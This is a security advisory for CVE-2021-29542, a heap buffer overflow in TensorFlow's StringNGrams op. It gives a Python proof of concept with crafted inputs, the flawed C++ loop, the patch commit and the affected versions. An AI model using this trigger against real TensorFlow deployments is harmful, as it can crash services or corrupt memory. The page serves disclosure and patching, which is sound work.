First published: Fri May 14 2021(Updated: )
### Impact An attacker can cause a heap buffer overflow by passing crafted inputs to `tf.raw_ops.StringNGrams`: ```python import tensorflow as tf separator = b'\x02\x00' ngram_widths = [7, 6, 11] left_pad = b'\x7f\x7f\x7f\x7f\x7f' right_pad = b'\x7f\x7f\x25\x5d\x53\x74' pad_width = 50 preserve_short_sequences = True l = ['', '', '', '', '', '', '', '', '', '', ''] data = tf.constant(l, shape=[11], dtype=tf.string) l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3] data_splits = tf.constant(l2, shape=[116], dtype=tf.int64) out = tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=separator, ngram_widths=ngram_widths, left_pad=left_pad, right_pad=right_pad, pad_width=pad_width, preserve_short_sequences=preserve_short_sequences) ``` This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/1cdd4da14282210cc759e468d9781741ac7d01bf/tensorflow/core/kernels/string_ngrams_op.cc#L171-L185) fails to consider corner cases where input would be split in such a way that the generated tokens should only contain padding elements: ```cc for (int ngram_index = 0; ngram_index < num_ngrams; ++ngram_index) { int pad_width = get_pad_width(ngram_width); int left_padding = std::max(0, pad_width - ngram_index); int right_padding = std::max(0, pad_width - (num_ngrams - (ngram_index + 1))); int num_tokens = ngram_width - (left_padding + right_padding); int data_start_index = left_padding > 0 ? 0 : ngram_index - pad_width; ... tstring* ngram = &output[ngram_index]; ngram->reserve(ngram_size); for (int n = 0; n < left_padding; ++n) { ngram->append(left_pad_); ngram->append(separator_); } for (int n = 0; n < num_tokens - 1; ++n) { ngram->append(data[data_start_index + n]); ngram->append(separator_); } ngram->append(data[data_start_index + num_tokens - 1]); // <<< for (int n = 0; n < right_padding; ++n) { ngram->append(separator_); ngram->append(right_pad_); } ... } ``` If input is such that `num_tokens` is 0, then, for `data_start_index=0` (when left padding is present), the marked line would result in reading `data[-1]`. ### Patches We have patched the issue in GitHub commit [ba424dd8f16f7110eea526a8086f1a155f14f22b](https://github.com/tensorflow/tensorflow/commit/ba424dd8f16f7110eea526a8086f1a155f14f22b). The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.
Credit: security-advisories@github.com security-advisories@github.com
Affected Software | Affected Version | How to fix |
---|---|---|
Google TensorFlow | <2.1.4 | |
Google TensorFlow | >=2.2.0<2.2.3 | |
Google TensorFlow | >=2.3.0<2.3.3 | |
Google TensorFlow | >=2.4.0<2.4.2 | |
pip/tensorflow-gpu | >=2.4.0<2.4.2 | 2.4.2 |
pip/tensorflow-gpu | >=2.3.0<2.3.3 | 2.3.3 |
pip/tensorflow-gpu | >=2.2.0<2.2.3 | 2.2.3 |
pip/tensorflow-gpu | <2.1.4 | 2.1.4 |
pip/tensorflow-cpu | >=2.4.0<2.4.2 | 2.4.2 |
pip/tensorflow-cpu | >=2.3.0<2.3.3 | 2.3.3 |
pip/tensorflow-cpu | >=2.2.0<2.2.3 | 2.2.3 |
pip/tensorflow-cpu | <2.1.4 | 2.1.4 |
pip/tensorflow | >=2.4.0<2.4.2 | 2.4.2 |
pip/tensorflow | >=2.3.0<2.3.3 | 2.3.3 |
pip/tensorflow | >=2.2.0<2.2.3 | 2.2.3 |
pip/tensorflow | <2.1.4 | 2.1.4 |
<2.1.4 | ||
>=2.2.0<2.2.3 | ||
>=2.3.0<2.3.3 | ||
>=2.4.0<2.4.2 |
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
CVE-2021-29542 is categorized as a critical vulnerability due to the potential for a heap buffer overflow.
To resolve CVE-2021-29542, upgrade TensorFlow to version 2.4.2 or later.
CVE-2021-29542 affects TensorFlow versions prior to 2.1.4, between 2.2.0 and 2.2.3, between 2.3.0 and 2.3.3, and between 2.4.0 and 2.4.2.
An attacker can exploit CVE-2021-29542 by sending crafted inputs to the tf.raw_ops.StringNGrams function.
CVE-2021-29542 is specific to applications using TensorFlow across various platforms that utilize the affected versions.